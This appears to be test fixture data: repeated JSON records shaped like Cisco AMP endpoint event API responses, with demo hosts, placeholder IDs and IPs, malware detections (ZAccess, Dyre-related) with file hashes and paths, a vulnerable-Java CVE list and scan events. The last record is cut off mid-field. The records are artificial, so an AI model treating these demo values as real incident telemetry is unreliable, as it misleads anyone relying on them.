-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":606000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182410","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":583000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182409","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182408","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":16000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182406","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900400000800,"timestamp":1610705109,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:05:09+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ZAccess.15nt","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705109,"start_date":"2021-01-15T10:05:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"disposition":"Clean","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255854610743000,"timestamp":1610705106,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:05:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255854610743321","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899799000300,"timestamp":1610705105,"timestamp_nanoseconds":799000000,"date":"2021-01-15T10:05:05+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705105,"start_date":"2021-01-15T10:05:05+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}},"vulnerabilities":[{"name":"Oracle Java(TM) Platform SE","version":"1.7.0:update_10","cve":"CVE-2013-5830","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830"},{"cve":"CVE-2013-5843","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5843"},{"cve":"CVE-2013-5842","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842"},{"cve":"CVE-2013-5817","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5817"},{"cve":"CVE-2013-5814","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5814"},{"cve":"CVE-2013-5809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809"},{"cve":"CVE-2013-5789","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5789"},{"cve":"CVE-2013-5829","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5829"},{"cve":"CVE-2013-5788","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5788"},{"cve":"CVE-2013-5824","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5824"},{"cve":"CVE-2013-5787","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5787"},{"cve":"CVE-2013-5782","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782"},{"cve":"CVE-2013-2470","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2470"},{"cve":"CVE-2013-2465","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465"},{"cve":"CVE-2013-2471","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2471"},{"cve":"CVE-2013-2473","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2473"},{"cve":"CVE-2013-2472","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2472"},{"cve":"CVE-2013-2469","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2469"},{"cve":"CVE-2013-2468","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2468"},{"cve":"CVE-2013-2466","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2466"},{"cve":"CVE-2013-2464","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2464"},{"cve":"CVE-2013-2463","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2463"},{"cve":"CVE-2013-2459","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2459"},{"cve":"CVE-2013-2428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2428"},{"cve":"CVE-2013-2420","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2420"},{"cve":"CVE-2013-2434","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2434"},{"cve":"CVE-2013-2384","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2384"},{"cve":"CVE-2013-1518","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1518"},{"cve":"CVE-2013-1537","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1537"},{"cve":"CVE-2013-2440","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2440"},{"cve":"CVE-2013-1557","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1557"},{"cve":"CVE-2013-1558","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1558"},{"cve":"CVE-2013-2435","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2435"},{"cve":"CVE-2013-2432","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2432"},{"cve":"CVE-2013-1569","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1569"},{"cve":"CVE-2013-2431","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2431"},{"cve":"CVE-2013-2383","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2383"},{"cve":"CVE-2013-2427","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2427"},{"cve":"CVE-2013-2425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2425"},{"cve":"CVE-2013-2422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2422"},{"cve":"CVE-2013-2414","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2414"},{"cve":"CVE-2013-0809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0809"},{"cve":"CVE-2013-1493","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493"},{"cve":"CVE-2013-1480","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1480"},{"cve":"CVE-2013-0428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0428"},{"cve":"CVE-2013-0437","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0437"},{"cve":"CVE-2013-0441","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0441"},{"cve":"CVE-2013-0442","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0442"},{"cve":"CVE-2013-0445","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0445"},{"cve":"CVE-2013-0450","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0450"},{"cve":"CVE-2013-1476","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1476"},{"cve":"CVE-2013-1478","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1478"},{"cve":"CVE-2013-1479","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1479"},{"cve":"CVE-2013-1484","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1484"},{"cve":"CVE-2013-0426","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0426"},{"cve":"CVE-2013-1486","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1486"},{"cve":"CVE-2013-1487","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1487"},{"cve":"CVE-2013-0425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0425"},{"cve":"CVE-2013-0422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422"},{"cve":"CVE-2013-0446","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0446"},{"cve":"CVE-2013-1475","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1475"},{"cve":"CVE-2013-2460","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2460"},{"cve":"CVE-2013-5838","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838"},{"cve":"CVE-2013-5777","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5777"},{"cve":"CVE-2013-5810","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5810"},{"cve":"CVE-2013-5832","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5832"},{"cve":"CVE-2013-5806","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5806"},{"cve":"CVE-2013-5805","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5805"},{"cve":"CVE-2013-5850","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850"},{"cve":"CVE-2013-5844","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5844"},{"cve":"CVE-2013-5846","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5846"},{"cve":"CVE-2013-2462","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2462"},{"cve":"CVE-2013-2436","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2436"},{"cve":"CVE-2013-2426","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2426"},{"cve":"CVE-2013-2421","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2421"},{"cve":"CVE-2013-2445","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2445"},{"cve":"CVE-2013-5852","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5852"},{"cve":"CVE-2013-2448","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2448"},{"cve":"CVE-2013-2394","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2394"},{"cve":"CVE-2013-2429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2429"},{"cve":"CVE-2013-2430","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2430"},{"cve":"CVE-2013-1563","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1563"},{"cve":"CVE-2013-0429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0429"},{"cve":"CVE-2013-0444","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0444"},{"cve":"CVE-2013-0419","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0419"},{"cve":"CVE-2013-0423","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0423"},{"cve":"CVE-2013-5775","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5775"},{"cve":"CVE-2013-5802","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802"},{"cve":"CVE-2013-2442","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2442"},{"cve":"CVE-2013-2461","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2461"},{"cve":"CVE-2013-0351","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0351"},{"cve":"CVE-2013-2439","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2439"},{"cve":"CVE-2013-0430","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0430"},{"cve":"CVE-2013-3829","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3829"},{"cve":"CVE-2013-5783","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5783"},{"cve":"CVE-2013-5804","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5804"},{"cve":"CVE-2013-5812","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5812"},{"cve":"CVE-2013-2407","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2407"},{"cve":"CVE-2013-0432","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0432"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255807366103000,"timestamp":1610705095,"timestamp_nanoseconds":45000000,"date":"2021-01-15T10:04:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255807366103064","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255777301332000,"timestamp":1610705088,"timestamp_nanoseconds":259000000,"date":"2021-01-15T10:04:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255777301331991","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832267006136549000,"timestamp":1610705083,"timestamp_nanoseconds":294000000,"date":"2021-01-15T10:04:43+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox","clean":true,"scanned_files":97,"scanned_processes":0,"scanned_paths":11,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266988956680000,"timestamp":1610705079,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:04:39+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255730056692000,"timestamp":1610705077,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:04:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255730056691734","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255674222117000,"timestamp":1610705064,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:04:24+00:00","event_type":"Threat 